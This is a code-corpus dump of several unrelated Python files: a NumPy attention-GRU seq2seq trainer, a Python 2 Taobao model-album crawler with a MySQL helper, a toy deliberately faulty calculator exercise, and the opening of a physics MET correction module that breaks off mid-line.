            for j in range(i + 1, L):
                # Same array object shared by two layers.
                if params[i] is params[j]:
                    grads[i] += grads[j]
                    find_flg = True
                    params.pop(j)
                    grads.pop(j)
                # Weight tying: one matrix is the transpose of the other.
                elif params[i].ndim == 2 and params[j].ndim == 2 and \
                        params[i].T.shape == params[j].shape and np.all(params[i].T == params[j]):
                    grads[i] += grads[j].T
                    find_flg = True
                    params.pop(j)
                    grads.pop(j)

                if find_flg: break
            if find_flg: break

        if not find_flg: break

    return params, grads


def eval_seq2seq(model, question, correct, id_to_char, verbose=False, is_reverse=False):
    """Generate an answer for *question* and score it against *correct*.

    Returns 1 when the generated string matches exactly, else 0. With
    verbose=True the Q/T/guess triple is printed (ANSI-colored on non-Windows).
    """
    correct = correct.flatten()
    # First id is the start-of-answer delimiter.
    start_id = correct[0]
    correct = correct[1:]
    guess = model.generate(question, start_id, len(correct))

    # Decode id sequences back to strings.
    question = ''.join([id_to_char[int(c)] for c in question.flatten()])
    correct = ''.join([id_to_char[int(c)] for c in correct])
    guess = ''.join([id_to_char[int(c)] for c in guess])

    if verbose:
        if is_reverse:
            question = question[::-1]  # undo the input reversal for display

        colors = {'ok': '\033[92m', 'fail': '\033[91m', 'close': '\033[0m'}
        print('Q', question)
        print('T', correct)

        is_windows = os.name == 'nt'
        if correct == guess:
            mark = colors['ok'] + '☑' + colors['close']
            if is_windows:
                mark = '0'  # cmd.exe cannot render the glyph/ANSI codes
            print(mark + ' ' + guess)
        else:
            mark = colors['fail'] + '☒' + colors['close']
            if is_windows:
                mark = 'X'
            print(mark + ' ' + guess)
        print('---')

    return 1 if guess == correct else 0


def softmax(x):
    """Numerically-stabilized softmax for 1-D or 2-D (row-wise) input."""
    if x.ndim == 2:
        x = x - x.max(axis=1, keepdims=True)
        x = np.exp(x)
        x /= x.sum(axis=1, keepdims=True)
    elif x.ndim == 1:
        x = x - np.max(x)
        x = np.exp(x) / np.sum(np.exp(x))
    return x


def sigmoid(x):
    """Element-wise logistic sigmoid."""
    return 1 / (1 + np.exp(-x))


class TimeSoftmaxWithLoss:
    """Softmax + cross-entropy over a whole (N, T, V) score sequence."""

    def __init__(self):
        self.params, self.grads = [], []
        self.cache = None
        self.ignore_label = -1  # targets equal to this are masked out

    def forward(self, xs, ts):
        N, T, V = xs.shape

        if ts.ndim == 3:  # one-hot targets -> index targets
            ts = ts.argmax(axis=2)

        mask = (ts != self.ignore_label)

        # Flatten batch and time dimensions together.
        xs = xs.reshape(N * T, V)
        ts = ts.reshape(N * T)
        mask = mask.reshape(N * T)

        ys = softmax(xs)
        ls = np.log(ys[np.arange(N * T), ts])
        ls *= mask  # ignored positions contribute zero loss
        loss = -np.sum(ls)
        loss /= mask.sum()  # average over the unmasked positions

        self.cache = (ts, ys, mask, (N, T, V))
        return loss

    def backward(self, dout=1):
        ts, ys, mask, (N, T, V) = self.cache

        dx = ys
        dx[np.arange(N * T), ts] -= 1  # softmax-CE gradient: y - onehot(t)
        dx *= dout
        dx /= mask.sum()
        dx *= mask[:, np.newaxis]  # zero the gradient at ignored positions

        dx = dx.reshape((N, T, V))
        return dx


class TimeAffine:
    """Affine (fully-connected) layer applied at every time step."""

    def __init__(self, W, b):
        self.params = [W, b]
        self.grads = [np.zeros_like(W), np.zeros_like(b)]
        self.x = None

    def forward(self, x):
        N, T, D = x.shape
        W, b = self.params

        rx = x.reshape(N * T, -1)  # collapse batch and time for one matmul
        out = np.dot(rx, W) + b
        self.x = x
        return out.reshape(N, T, -1)

    def backward(self, dout):
        x = self.x
        N, T, D = x.shape
        W, b = self.params

        dout = dout.reshape(N * T, -1)
        rx = x.reshape(N * T, -1)

        db = np.sum(dout, axis=0)
        dW = np.dot(rx.T, dout)
        dx = np.dot(dout, W.T)
        dx = dx.reshape(*x.shape)

        self.grads[0][...] = dW
        self.grads[1][...] = db
        return dx


class Embedding:
    """Row-lookup embedding for a single time step."""

    def __init__(self, W):
        self.params = [W]
        self.grads = [np.zeros_like(W)]
        self.idx = None  # word ids used in the last forward pass

    def forward(self, idx):
        W, = self.params
        self.idx = idx
        out = W[idx]
        return out

    def backward(self, dout):
        dW, = self.grads
        dW[...] = 0  # keep the array, zero the contents
        # Scatter-add so duplicate ids accumulate correctly.
        np.add.at(dW, self.idx, dout)
        return None


class TimeEmbedding:
    """Embedding lookup applied across a whole (N, T) id batch."""

    def __init__(self, W):
        self.params = [W]
        self.grads = [np.zeros_like(W)]
        self.layers = None
        self.W = W

    def forward(self, xs):
        N, T = xs.shape
        V, D = self.W.shape

        out = np.empty((N, T, D), dtype='f')
        self.layers = []

        for t in range(T):
            layer = Embedding(self.W)  # all steps share the same weight
            out[:, t, :] = layer.forward(xs[:, t])
            self.layers.append(layer)

        return out

    def backward(self, dout):
        N, T, D = dout.shape

        grad = 0
        for t in range(T):
            layer = self.layers[t]
            layer.backward(dout[:, t, :])
            grad += layer.grads[0]  # accumulate over time steps

        self.grads[0][...] = grad
        return None


class GRU:
    """Single-step GRU cell. Wx/Wh/b each pack the z, r, h gates side by side."""

    def __init__(self, Wx, Wh, b):
        self.params = [Wx, Wh, b]
        self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]
        self.cache = None

    def forward(self, x, h_prev):
        """Shapes: x (N, D), Wx (D, 3H), h_prev (N, H), Wh (H, 3H), b (3H,)."""
        Wx, Wh, b = self.params
        H = Wh.shape[0]

        # Split the packed parameters into the three gates (z, r, h).
        Wxz, Wxr, Wxh = Wx[:, :H], Wx[:, H:2 * H], Wx[:, 2 * H:]
        Whz, Whr, Whh = Wh[:, :H], Wh[:, H:2 * H], Wh[:, 2 * H:]
        bz, br, bh = b[:H], b[H:2 * H], b[2 * H:]

        # Standard GRU equations.
        z = sigmoid(np.dot(x, Wxz) + np.dot(h_prev, Whz) + bz)
        r = sigmoid(np.dot(x, Wxr) + np.dot(h_prev, Whr) + br)
        h_hat = np.tanh(np.dot(x, Wxh) + np.dot(r * h_prev, Whh) + bh)
        h_next = (1 - z) * h_prev + z * h_hat

        self.cache = (x, h_prev, z, r, h_hat)
        return h_next

    def backward(self, dh_next):
        Wx, Wh, b = self.params
        H = Wh.shape[0]

        Wxz, Wxr, Wxh = Wx[:, :H], Wx[:, H:2 * H], Wx[:, 2 * H:]
        Whz, Whr, Whh = Wh[:, :H], Wh[:, H:2 * H], Wh[:, 2 * H:]
        x, h_prev, z, r, h_hat = self.cache

        # Backprop through h_next = (1 - z) * h_prev + z * h_hat.
        dh_hat = dh_next * z
        dh_prev = dh_next * (1 - z)

        # Candidate state branch (tanh).
        dt = dh_hat * (1 - h_hat ** 2)
        dbh = np.sum(dt, axis=0)
        dWhh = np.dot((r * h_prev).T, dt)
        dhr = np.dot(dt, Whh.T)
        dWxh = np.dot(x.T, dt)
        dx = np.dot(dt, Wxh.T)
        dh_prev += r * dhr

        # Update gate branch (sigmoid).
        dz = dh_next * h_hat - dh_next * h_prev
        dt = dz * z * (1 - z)
        dbz = np.sum(dt, axis=0)
        dWhz = np.dot(h_prev.T, dt)
        dh_prev += np.dot(dt, Whz.T)
        dWxz = np.dot(x.T, dt)
        dx += np.dot(dt, Wxz.T)

        # Reset gate branch (sigmoid).
        dr = dhr * h_prev
        dt = dr * r * (1 - r)
        dbr = np.sum(dt, axis=0)
        dWhr = np.dot(h_prev.T, dt)
        dh_prev += np.dot(dt, Whr.T)
        dWxr = np.dot(x.T, dt)
        dx += np.dot(dt, Wxr.T)

        # Repack the per-gate gradients side by side.
        self.dWx = np.hstack((dWxz, dWxr, dWxh))
        self.dWh = np.hstack((dWhz, dWhr, dWhh))
        self.db = np.hstack((dbz, dbr, dbh))

        self.grads[0][...] = self.dWx
        self.grads[1][...] = self.dWh
        self.grads[2][...] = self.db

        return dx, dh_prev


class TimeGRU:
    """GRU unrolled over T time steps; optionally stateful across calls."""

    def __init__(self, Wx, Wh, b, stateful=False):
        self.params = [Wx, Wh, b]
        self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]
        self.layers = None
        self.h, self.dh = None, None
        self.stateful = stateful

    def forward(self, xs):
        Wx, Wh, b = self.params
        N, T, D = xs.shape
        H = Wh.shape[0]
        self.layers = []
        hs = np.empty((N, T, H), dtype='f')

        if not self.stateful or self.h is None:
            self.h = np.zeros((N, H), dtype='f')

        for t in range(T):
            layer = GRU(*self.params)
            self.h = layer.forward(xs[:, t, :], self.h)
            hs[:, t, :] = self.h
            self.layers.append(layer)

        return hs

    def backward(self, dhs):
        Wx, Wh, b = self.params
        N, T, H = dhs.shape
        D = Wx.shape[0]

        dxs = np.empty((N, T, D), dtype='f')

        dh = 0
        grads = [0, 0, 0]
        # Walk time backwards, accumulating shared-weight gradients.
        for t in reversed(range(T)):
            layer = self.layers[t]
            dx, dh = layer.backward(dhs[:, t, :] + dh)
            dxs[:, t, :] = dx

            for i, grad in enumerate(layer.grads):
                grads[i] += grad

        for i, grad in enumerate(grads):
            self.grads[i][...] = grad

        self.dh = dh  # gradient w.r.t. the initial hidden state
        return dxs

    def set_state(self, h):
        self.h = h

    def reset_state(self):
        self.h = None


class Softmax:
    """Plain softmax layer (used inside the attention weights)."""

    def __init__(self):
        self.params, self.grads = [], []
        self.out = None

    def forward(self, x):
        self.out = softmax(x)
        return self.out

    def backward(self, dout):
        dx = self.out * dout
        sumdx = np.sum(dx, axis=1, keepdims=True)
        dx -= self.out * sumdx
        return dx


class WeightSum:
    """Weighted sum of encoder states -> context vector (no parameters)."""

    def __init__(self):
        self.params, self.grads = [], []
        self.cache = None

    def forward(self, hs, a):
        N, T, H = hs.shape

        # a (N, T) holds per-word importance; broadcast it to (N, T, H).
        ar = a.reshape(N, T, 1).repeat(H, axis=2)
        t = hs * ar
        c = np.sum(t, axis=1)  # collapse time -> context vector (N, H)

        self.cache = (hs, ar)
        return c

    def backward(self, dc):
        hs, ar = self.cache
        N, T, H = hs.shape

        dt = dc.reshape(N, 1, H).repeat(T, axis=1)  # sum backward
        dhs = dt * ar
        dar = dt * hs
        da = np.sum(dar, axis=2)  # repeat backward -> (N, T)

        return dhs, da


class AttentionWeight:
    """Similarity of decoder state h to each encoder state, softmax-normalized."""

    def __init__(self):
        self.params, self.grads = [], []
        self.softmax = Softmax()
        self.cache = None

    def forward(self, hs, h):
        N, T, H = hs.shape

        hr = h.reshape(N, 1, H).repeat(T, axis=1)  # broadcast h along time
        t = hs * hr  # elementwise similarity terms
        s = np.sum(t, axis=2)  # dot products per time step
        a = self.softmax.forward(s)  # attention distribution over T

        self.cache = (hs, hr)
        return a

    def backward(self, da):
        hs, hr = self.cache
        N, T, H = hs.shape

        ds = self.softmax.backward(da)
        dt = ds.reshape(N, T, 1).repeat(H, axis=2)  # sum backward
        dhr = dt * hs
        dhs = dt * hr
        dh = np.sum(dhr, axis=1)  # repeat backward -> (N, H)

        return dhs, dh


class Attention:
    """One attention step: weights + weighted sum for a single decoder state."""

    def __init__(self):
        self.params, self.grads = [], []
        self.attention_weight_layer = AttentionWeight()
        self.weight_sum_layer = WeightSum()
        self.attention_weight = None  # last weights, kept for visualization

    def forward(self, hs, h):
        a = self.attention_weight_layer.forward(hs, h)
        out = self.weight_sum_layer.forward(hs, a)
        self.attention_weight = a
        return out

    def backward(self, dout):
        dhs0, da = self.weight_sum_layer.backward(dout)
        dhs1, dh = self.attention_weight_layer.backward(da)
        dhs = dhs0 + dhs1  # hs feeds both sub-layers
        return dhs, dh


class TimeAttention:
    """Attention applied at every decoder time step."""

    def __init__(self):
        self.params, self.grads = [], []
        self.layers = None
        self.attention_weights = None

    def forward(self, hs_enc, hs_dec):
        N, T, H = hs_dec.shape
        out = np.empty_like(hs_dec)
        self.layers = []
        self.attention_weights = []

        for t in range(T):
            layer = Attention()
            out[:, t, :] = layer.forward(hs_enc, hs_dec[:, t, :])
            self.layers.append(layer)
            # Keep each step's word weights for later inspection.
            self.attention_weights.append(layer.attention_weight)

        return out

    def backward(self, dout):
        N, T, H = dout.shape
        dhs_enc = 0
        dhs_dec = np.empty_like(dout)

        for t in range(T):
            layer = self.layers[t]
            dhs, dh = layer.backward(dout[:, t, :])
            dhs_enc += dhs  # encoder states feed every step: accumulate
            dhs_dec[:, t, :] = dh

        return dhs_enc, dhs_dec


class AttentionEncoderGRU:
    """Encoder: embedding + GRU; returns the full hidden-state sequence.

    vocab_size: number of distinct characters.
    wordvec_size: embedding dimension.
    hidden_size: GRU hidden-state dimension.
    """

    def __init__(self, vocab_size, wordvec_size, hidden_size):
        V, D, H = vocab_size, wordvec_size, hidden_size
        rn = np.random.randn

        embed_W = (rn(V, D) / 100).astype('f')
        gru_Wx = (rn(D, 3 * H) / np.sqrt(D)).astype('f')
        gru_Wh = (rn(H, 3 * H) / np.sqrt(H)).astype('f')
        gru_b = np.zeros(3 * H).astype('f')

        self.embed = TimeEmbedding(embed_W)
        # stateful=False: short independent sequences, state is not carried over.
        self.gru = TimeGRU(gru_Wx, gru_Wh, gru_b, stateful=False)

        self.params = self.embed.params + self.gru.params
        self.grads = self.embed.grads + self.gru.grads
        self.hs = None

    def forward(self, xs):
        xs = self.embed.forward(xs)
        hs = self.gru.forward(xs)
        return hs  # the whole sequence is handed to the decoder's attention

    def backward(self, dhs):
        dout = self.gru.backward(dhs)
        dout = self.embed.backward(dout)
        return dout


class AttentionDecoderGRU:
    """Decoder: embedding + GRU + attention + affine projection to vocab scores."""

    def __init__(self, vocab_size, wordvec_size, hidden_size):
        V, D, H = vocab_size, wordvec_size, hidden_size
        rn = np.random.randn

        embed_W = (rn(V, D) / 100).astype('f')
        gru_Wx = (rn(D, 3 * H) / np.sqrt(D)).astype('f')
        gru_Wh = (rn(H, 3 * H) / np.sqrt(H)).astype('f')
        gru_b = np.zeros(3 * H).astype('f')
        # Affine input is [context; hidden] -> width 2H.
        affine_W = (rn(2 * H, V) / np.sqrt(2 * H)).astype('f')
        affine_b = np.zeros(V).astype('f')

        self.embed = TimeEmbedding(embed_W)
        self.gru = TimeGRU(gru_Wx, gru_Wh, gru_b, stateful=True)
        self.attention = TimeAttention()
        self.affine = TimeAffine(affine_W, affine_b)
        layers = [self.embed, self.gru, self.attention, self.affine]

        self.params, self.grads = [], []
        for layer in layers:
            self.params += layer.params
            self.grads += layer.grads

    def forward(self, xs, enc_hs):
        h = enc_hs[:, -1]  # encoder's final state seeds the decoder
        self.gru.set_state(h)

        out = self.embed.forward(xs)
        dec_hs = self.gru.forward(out)
        c = self.attention.forward(enc_hs, dec_hs)
        out = np.concatenate((c, dec_hs), axis=2)  # [context; hidden]
        score = self.affine.forward(out)

        return score

    def backward(self, dscore):
        dout = self.affine.backward(dscore)
        N, T, H2 = dout.shape
        H = H2 // 2

        # Split the affine gradient back into context and hidden halves.
        dc, ddec_hs0 = dout[:, :, :H], dout[:, :, H:]
        # Attention returns gradients for encoder hs and decoder hs.
        denc_hs, ddec_hs1 = self.attention.backward(dc)
        # Hidden states fed both attention and affine: merge the two paths.
        ddec_hs = ddec_hs0 + ddec_hs1
        dout = self.gru.backward(ddec_hs)
        dh = self.gru.dh
        denc_hs[:, -1] += dh  # seed state came from the encoder's last hs

        self.embed.backward(dout)

        return denc_hs

    def generate(self, enc_hs, start_id, sample_size):
        """Greedy-decode *sample_size* ids, starting from *start_id*."""
        sampled = []
        sample_id = start_id
        h = enc_hs[:, -1]
        self.gru.set_state(h)

        for _ in range(sample_size):
            # Feed the previously generated id back in as the next input.
            x = np.array([sample_id]).reshape((1, 1))

            out = self.embed.forward(x)
            dec_hs = self.gru.forward(out)
            c = self.attention.forward(enc_hs, dec_hs)
            out = np.concatenate((c, dec_hs), axis=2)
            score = self.affine.forward(out)

            sample_id = np.argmax(score.flatten())  # deterministic (argmax) decoding
            sampled.append(sample_id)

        return sampled


class AttentionSeq2seqGRU:
    """Full attention seq2seq model: encoder + decoder + time-series loss."""

    def __init__(self, vocab_size, wordvec_size, hidden_size):
        args = vocab_size, wordvec_size, hidden_size
        self.encoder = AttentionEncoderGRU(*args)
        self.decoder = AttentionDecoderGRU(*args)
        self.softmax = TimeSoftmaxWithLoss()

        self.params = self.encoder.params + self.decoder.params
        self.grads = self.encoder.grads + self.decoder.grads

    def forward(self, xs, ts):
        # Teacher forcing: decoder sees ts[:-1], is scored against ts[1:].
        decoder_xs, decoder_ts = ts[:, :-1], ts[:, 1:]
        h = self.encoder.forward(xs)
        score = self.decoder.forward(decoder_xs, h)
        loss = self.softmax.forward(score, decoder_ts)
        return loss

    def backward(self, dout=1):
        dout = self.softmax.backward(dout)
        dh = self.decoder.backward(dout)
        dout = self.encoder.backward(dh)
        return dout

    def generate(self, xs, start_id, sample_size):
        h = self.encoder.forward(xs)
        sampled = self.decoder.generate(h, start_id, sample_size)
        return sampled

    def save_params(self, file_name=None):
        """Pickle the parameters as float16 to <ClassName>.pkl by default."""
        if file_name is None:
            file_name = self.__class__.__name__ + '.pkl'

        params = [p.astype(np.float16) for p in self.params]
        with open(file_name, 'wb') as f:
            pickle.dump(params, f)

    def load_params(self, file_name=None):
        """Load pickled parameters (saved by save_params) in place."""
        if file_name is None:
            file_name = self.__class__.__name__ + '.pkl'

        if '/' in file_name:
            file_name = file_name.replace('/', os.sep)

        if not os.path.exists(file_name):
            raise IOError('No file: ' + file_name)

        with open(file_name, 'rb') as f:
            params = pickle.load(f)

        params = [p.astype('f') for p in params]
        for i, param in enumerate(self.params):
            param[...] = params[i]


# ---- Training script ----
(x_train, t_train), (x_test, t_test) = load_data('date.txt')
char_to_id, id_to_char = get_vocab()

# Reversing the input sequence improves learning accuracy.
x_train, x_test = x_train[:, ::-1], x_test[:, ::-1]

vocab_size = len(char_to_id)
wordvec_size = 16
hidden_size = 256
batch_size = 64
max_epoch = 4
max_grad = 5.0

model = AttentionSeq2seqGRU(vocab_size, wordvec_size, hidden_size)
optimizer = Adam()
trainer = Trainer(model, optimizer)

acc_list = []
for epoch in range(max_epoch):
    trainer.fit(x_train, t_train, max_epoch=1,
                batch_size=batch_size, max_grad=max_grad)

    # Evaluate exact-match accuracy on the held-out set after each epoch.
    correct_num = 0
    for i in range(len(x_test)):
        question, correct = x_test[[i]], t_test[[i]]
        verbose = i < 10  # print the first 10 examples only
        correct_num += eval_seq2seq(model, question, correct,
                                    id_to_char, verbose, is_reverse=True)

    acc = float(correct_num) / len(x_test)
    acc_list.append(acc)
    print('val acc %.3f%%' % (acc * 100))

model.save_params()

# Plot accuracy per epoch.
x = np.arange(len(acc_list))
plt.plot(x, acc_list, marker='o')
plt.xlabel('epochs')
plt.ylabel('accuracy')
plt.ylim(-0.05, 1.05)
plt.show()
Python
862
29.783062
143
/train_seq2seq_gru_attention.py
0.529188
0.519465
cheenwe/mm
refs/heads/master
# encoding=utf-8 import re import os import utils import urllib2 from sqlhelper import SqlHelper from bs4 import BeautifulSoup as bs class Crawler(object): def __init__(self): super(Crawler, self).__init__() self.album_prefix = 'https://mm.taobao.com/self/album/open_album_list.htm?_charset=utf-8&user_id%20={0}&page={1}' self.image_prefix = 'https://mm.taobao.com/album/json/get_album_photo_list.htm?user_id={0}&album_id={1}&page={2}' self.image_pattern = re.compile('''img.*290x10000.jpg''', re.U) self.image_name_pattern = re.compile('''"picId":"(.*?)"''', re.U) self.model_pattern = re.compile('''<a class="lady-name" href="(.*?)".*>(.*?)</a>''', re.U) self.album_pattern = re.compile('''.*album_id=(.*?)&.*''', re.U) self.links = [] self.ids= [] self.names= [] self.sql = SqlHelper() def readHtml(self, html): response = urllib2.urlopen(html) return response.read() def getLinkIdAndNames(self, htmlData): items = re.findall(self.model_pattern, htmlData) self.links = [link for link, name in items] self.names = [name.decode('gbk') for link, name in items] self.ids = [link[link.index('=')+1:] for link in self.links] def getAlbums(self): for i, model_id in enumerate(self.ids): utils.log('start downloading:%s' % self.names[i]) # print 'start downloading', self.names[i] # 插入用户 command = self.sql.insert_data_to_users() msg = (model_id, self.names[i], "",) try: self.sql.insert_data(command, msg, commit = True) except Exception, e: utils.log('insert users data errors') for page in xrange(1, 10): utils.log('current page:%s' % page) # print 'current page', page model_url = self.album_prefix.format(model_id, page) soup = bs(self.readHtml(model_url), 'html.parser') albums = soup.find_all('div', class_ = 'mm-photo-cell-middle') if not albums: break for album in albums: album_name = album.find('h4').a.string.strip().rstrip('.') album_link= album.find('h4').a['href'] album_id = re.findall(self.album_pattern, album_link)[0] album_create_time = album.find('p', class_ = 
'mm-photo-date').string.strip(u'创建时间: ').strip(u'´´½¨Ê±¼ä:') album_img_count = album.find('span', class_ = 'mm-pic-number').string.strip('()').strip(u'张').strip(u'ÕÅ') # print ">>>>>>>>>>>>>>>>>>>>>>" # print album.find('p', class_ = 'mm-photo-date').string # print album_create_time # print ">>>>>>>>>>>>>>>>>>>>>>" # 插入相册 command = self.sql.insert_data_to_albums() msg = (album_id, model_id, album_name, album_create_time, "", 1, album_img_count) try: self.sql.insert_data(command, msg, commit = True) except Exception, e: utils.log('insert albums data errors') utils.log('start in album:%s, total size: %s' % (album_name, album_img_count)) self.getImages(model_id, album_id, album_img_count) def getImages(self, model_id, album_id, image_count): # print 'start downloading album', album_id, image_count, '张' for page in xrange(1, (int(image_count)-1)/16+2): link = self.image_prefix.format(model_id, album_id, page) body = self.readHtml(link).decode('gbk') images = re.findall(self.image_pattern, body) # tried to use des as names, however, it duplicates times. So i chose pic ids. names = re.findall(self.image_name_pattern, body) for idx, image in enumerate(images): image = image.replace('290', '620') try: img_url = ('http://'+image).replace('jpg_620x10000.jpg','jpg') except Exception as e: img_url = ('http://'+image) # id , album_id , name , url , kind # 插入图片 command = self.sql.insert_data_to_photos() msg = (None, album_id, "", img_url, 1) try: self.sql.insert_data(command, msg, commit = True) except Exception, e: utils.log('insert photos data errors') # print 'created photos success' if __name__ == '__main__': test_html = 'https://mm.taobao.com/json/request_top_list.htm?page={0}' for page in xrange(1, 100): c = Crawler() data = c.readHtml(test_html.format(page)) c.getLinkIdAndNames(data) c.getAlbums()
Python
121
40.206612
126
/mm.py
0.519655
0.508624
cheenwe/mm
refs/heads/master
# coding=utf-8 import utils import logging import config import pymysql class SqlHelper(object): def __init__(self): self.conn = pymysql.connect(**config.database_config) self.cursor = self.conn.cursor() try: self.conn.select_db(config.database) except: self.create_database() self.conn.select_db(config.database) def create_database(self): try: command = 'CREATE DATABASE IF NOT EXISTS %s DEFAULT CHARACTER SET \'utf8\' ' % config.database utils.log('create_database command:%s' % command) self.cursor.execute(command) self.conn.commit() except Exception, e: utils.log('SqlHelper create_database exception:%s' % str(e), logging.WARNING) def create_table(self, command): try: utils.log('create_table command:%s' % command) x = self.cursor.execute(command) self.conn.commit() return x except Exception, e: utils.log('create_table exception:%s' % str(e), logging.WARNING) def insert_data(self, command, data, commit = False): try: # utils.log('insert_data command:%s, data:%s' % (command, data)) x = self.cursor.execute(command, data) if commit: self.conn.commit() return x except Exception, e: utils.log('insert_data exception msg:%s' % str(e), logging.WARNING) def commit(self): self.conn.commit() def execute(self, command, commit = True): try: utils.log('execute command:%s' % command) data = self.cursor.execute(command) if commit: self.conn.commit() return data except Exception, e: utils.log('execute exception msg:%s' % str(e)) return None def query(self, command, commit = False): try: utils.log('execute command:%s' % command) self.cursor.execute(command) data = self.cursor.fetchall() if commit: self.conn.commit() return data except Exception, e: utils.log('execute exception msg:%s' % str(e)) return None def query_one(self, command, commit = False): try: utils.log('execute command:%s' % command) self.cursor.execute(command) data = self.cursor.fetchone() if commit: self.conn.commit() return data except Exception, e: utils.log('execute exception msg:%s' % str(e)) return None def 
insert_data_to_users(self): command = ("INSERT INTO users " "(id, name, remark)" "VALUES(%s, %s, %s)") return command def insert_data_to_albums(self): command = ("INSERT INTO albums " "(id, user_id, name, created_at, remark, kind, total)" "VALUES(%s, %s, %s, %s, %s, %s, %s)") return command def insert_data_to_photos(self): command = ("INSERT INTO photos " "(id, album_id, name, url, kind)" "VALUES(%s, %s, %s, %s, %s)") return command #创建表 sql = SqlHelper() sql.create_table("create table IF NOT EXISTS users(id bigint, name varchar(255), remark text )") sql.create_table("create table IF NOT EXISTS albums(id bigint, user_id bigint, name varchar(255), created_at date, remark text, kind int, total float) ") sql.create_table("create table IF NOT EXISTS photos(id bigint, album_id bigint, name varchar(255), url varchar(255), kind int) ")
Python
111
32.441441
154
/sqlhelper.py
0.554418
0.550647
cheenwe/mm
refs/heads/master
# encoding=utf-8 import logging import os import config import traceback import datetime # 自定义的日志输出 def log(msg, level = logging.DEBUG): if not os.path.exists('log'): os.makedirs('log') logging.basicConfig( filename = 'log/run.log', format = '%(asctime)s: %(message)s', level = logging.DEBUG ) logging.log(level, msg) print('%s [%s], msg:%s' % (datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), level, msg)) if level == logging.WARNING or level == logging.ERROR: for line in traceback.format_stack(): print(line.strip()) for line in traceback.format_stack(): logging.log(level, line.strip()) def make_dir(dir): log('make dir:%s' % dir) if not os.path.exists(dir): os.makedirs(dir)
Python
36
21.444445
98
/utils.py
0.595297
0.594059
cheenwe/mm
refs/heads/master
# encoding=utf-8 from sqlhelper import SqlHelper sql = SqlHelper() def insert_data_to_users(): command = ("INSERT IGNORE INTO users " "(id, name, created_at, remark)" "VALUES(%s, %s, %s, %s)") return command command = insert_data_to_users() msg = (None, "112", "", "",) sql.insert_data(command, msg, commit = True) print 'created user success'
Python
19
18.210526
44
/mm_test.py
0.641096
0.630137
ravisharma607/Faulty-Calculator
refs/heads/master
""" Q->) design a calculator which will correctly solve all the problem except the following one 45*3 = 123, 85+2 = 546, 33-23 = 582 | your program should take operator and two numbers as input from the user and then return the result """ try: num1 = int(input("enter first number:")) num2 = int(input("enter second number:")) op = input("choose operatot => | +, -, *, /| :") if (num1 == 45 and num2 == 3 or num1 == 85 and num2 == 2 or num1 == 33 and num2 == 23): if op == "+": print(546) elif op == "-": print(582) elif op == "*": print(123) else: if op == "+": print(num1 + num2) elif op == "-": print(num1 - num2) elif op == "*": print(num1 * num2) elif op == "/": print(num1 / num2) except Exception as e: print("Please Enter a Valid Integer Value")
Python
24
37.291668
142
/faultyCalcy.py
0.518519
0.459695
dabercro/Xbb
refs/heads/master
#!/usr/bin/env python from __future__ import print_function import ROOT from BranchTools import Collection from BranchTools import AddCollectionsModule import array import os import math import numpy as np # MET X/Y correction class METXY(AddCollectionsModule): def __init__(self, year): super(METXY, self).__init__() self.debug = 'XBBDEBUG' in os.environ self.year = int(year) self.quickloadWarningShown = False self.systematics = ['jer','jesAbsoluteStat','jesAbsoluteScale','jesAbsoluteFlavMap','jesAbsoluteMPFBias','jesFragmentation','jesSinglePionECAL','jesSinglePionHCAL','jesFlavorQCD','jesRelativeJEREC1','jesRelativeJEREC2','jesRelativeJERHF','jesRelativePtBB','jesRelativePtEC1','jesRelativePtEC2','jesRelativePtHF','jesRelativeBal','jesRelativeFSR','jesRelativeStatFSR','jesRelativeStatEC','jesRelativeStatHF','jesPileUpDataMC','jesPileUpPtRef','jesPileUpPtBB','jesPileUpPtEC1','jesPileUpPtEC2','jesPileUpPtHF','jesPileUpMuZero','jesPileUpEnvelope','jesTotal','unclustEn'] def customInit(self, initVars): self.sampleTree = initVars['sampleTree'] self.sample = initVars['sample'] self.config = initVars['config'] # load METXYCorr_Met_MetPhi from VHbb namespace VHbbNameSpace = self.config.get('VHbbNameSpace', 'library') ROOT.gSystem.Load(VHbbNameSpace) self.MET_Pt = array.array('f', [0.0]) self.MET_Phi = array.array('f', [0.0]) self.sampleTree.tree.SetBranchAddress("MET_Pt", self.MET_Pt) self.sampleTree.tree.SetBranchAddress("MET_Phi", self.MET_Phi) self.addBranch("MET_Pt_uncorrected") self.addBranch("MET_Phi_uncorrected") if self.sample.isMC(): self.MET_Pt_syst = {} self.MET_Phi_syst = {} for syst in self.systematics: self.MET_Pt_syst[syst] = {} self.MET_Phi_syst[syst] = {} for Q in self._variations(syst): self.MET_Pt_syst[syst][Q] = array.array('f', [0.0]) self.MET_Phi_syst[syst][Q] = array.array('f', [0.0]) self.sampleTree.tree.SetBranchAddress("MET_pt_"+syst+Q, self.MET_Pt_syst[syst][Q]) self.sampleTree.tree.SetBranchAddress("MET_phi_"+syst+Q, self.MET_Phi_syst[syst][Q]) 
self.addBranch("MET_pt_uncorrected_"+syst+Q) self.addBranch("MET_phi_uncorrected_"+syst+Q) def processEvent(self, tree): if not self.hasBeenProcessed(tree): self.markProcessed(tree) # backup uncorrected branches self._b('MET_Pt_uncorrected')[0] = tree.MET_Pt self._b('MET_Phi_uncorrected')[0] = tree.MET_Phi MET_Pt_corrected, MET_Phi_corrected = ROOT.VHbb.METXYCorr_Met_MetPhi(tree.MET_Pt, tree.MET_Phi, tree.run, self.year, self.sample.isMC(), tree.PV_npvs) # overwrite MET_Pt, MET_Phi branches self.MET_Pt[0] = MET_Pt_corrected self.MET_Phi[0] = MET_Phi_corrected if self.sample.isMC(): for syst in self.systematics: for Q in self._variations(syst): # backup uncorrected branches self._b("MET_pt_uncorrected_"+syst+Q)[0] = self.MET_Pt_syst[syst][Q][0] self._b("MET_phi_uncorrected_"+syst+Q)[0] = self.MET_Phi_syst[syst][Q][0] MET_Pt_corrected, MET_Phi_corrected = ROOT.VHbb.METXYCorr_Met_MetPhi(self.MET_Pt_syst[syst][Q][0], self.MET_Phi_syst[syst][Q][0], tree.run, self.year, self.sample.isMC(), tree.PV_npvs) # overwrite MET_Pt, MET_Phi branches self.MET_Pt_syst[syst][Q][0] = MET_Pt_corrected self.MET_Phi_syst[syst][Q][0] = MET_Phi_corrected # formulas by default reload the branch content when evaluating the first instance of the object! # SetQuickLoad(1) turns off this behavior for formulaName, treeFormula in self.sampleTree.formulas.items(): if 'MET' in formulaName: if not self.quickloadWarningShown: self.quickloadWarningShown = True print("INFO: SetQuickLoad(1) called for formula:", 